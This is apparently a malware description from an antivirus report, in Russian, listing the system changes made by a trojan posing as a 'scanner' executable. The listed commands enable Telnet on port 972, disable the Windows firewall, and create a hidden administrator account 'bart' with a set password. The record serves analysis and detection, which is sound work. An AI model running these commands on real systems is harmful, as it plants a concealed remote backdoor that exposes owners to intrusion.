Техническая информация
- [<HKLM>\SYSTEM\ControlSet001\Services\TlntSvr] 'Start' = '00000002'
- <SYSTEM32>\sc.exe config tlntsvr start= auto
- %WINDIR%\regedit.exe /s conf.reg
- <SYSTEM32>\sc.exe config sharedaccess start= disabled
- <SYSTEM32>\tlntadmn.exe config port=972 sec=-SSH
- <SYSTEM32>\regsvr32.exe /s <SYSTEM32>\tlntsvrp.dll
- <SYSTEM32>\tlntsvr.exe
- <SYSTEM32>\net1.exe start Telnet
- <SYSTEM32>\net1.exe localgroup Администраторы bart /add
- <SYSTEM32>\net1.exe user bart 231 /add
- <SYSTEM32>\chcp.com 1251
- <SYSTEM32>\net1.exe localgroup %USERNAME%s bart /add
- <SYSTEM32>\net1.exe stop sharedaccess
- <SYSTEM32>\net.exe stop sharedaccess
- <SYSTEM32>\reg.exe ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "bart" /t REG_DWORD /d 0 /f
- <LS_APPDATA>\Сканер..exe
- %TEMP%\~1.bat
- %TEMP%\~1.bat
- ClassName: 'RegEdit_RegEdit' WindowName: ''